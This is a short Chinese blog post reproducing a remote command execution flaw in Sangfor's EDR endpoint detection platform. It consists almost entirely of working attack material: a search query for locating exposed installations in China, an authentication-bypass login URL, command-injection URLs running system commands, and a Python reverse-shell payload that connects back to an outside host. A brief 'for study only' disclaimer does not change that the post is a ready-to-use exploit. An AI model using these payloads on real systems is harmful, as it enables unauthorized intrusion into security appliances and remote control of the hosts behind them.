深信服EDR远程命令执行漏洞复现
2020-08-31 本文已影响0人
migrate_
0x01仅供交流与学习使用,请勿用于非法用途
- 目标
title="终端检测响应平台" && country="CN"
- payload
#越权登录
https://ip:xx/ui/login.php?user=admin #(用户名必须存在)
#命令执行
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=id
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&host=whoami
#反弹shell
https://xx.xx.xx.37/tool/log/c.php?strip_slashes=system&path=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('xx.xx.xx.105',1919));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
1.jpg
2.jpg
3.jpg